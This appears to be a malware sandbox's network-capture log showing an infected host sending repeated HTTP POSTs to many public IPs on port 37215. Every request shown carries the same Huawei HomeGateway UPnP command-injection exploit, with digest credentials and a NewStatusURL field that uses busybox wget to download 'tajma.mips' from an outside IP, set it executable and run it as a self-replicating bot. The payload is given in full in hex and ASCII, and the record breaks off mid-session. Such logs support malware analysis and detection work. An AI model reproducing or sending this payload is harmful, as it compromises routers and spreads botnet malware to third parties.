                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        666192.168.2.2348978197.84.234.2437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495843887 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        667192.168.2.2353902197.137.17.16737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495856047 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        668192.168.2.233586641.107.198.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495934010 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        669192.168.2.234974247.248.96.16437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495937109 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        670192.168.2.2346082157.133.216.21537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495944023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        671192.168.2.2335550197.232.106.17137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495959997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        672192.168.2.2333868157.77.68.4237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495959997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        673192.168.2.2338974197.67.206.21137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496016979 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        674192.168.2.2357126197.119.164.14237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496040106 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        675192.168.2.2359352174.107.154.3037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496054888 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
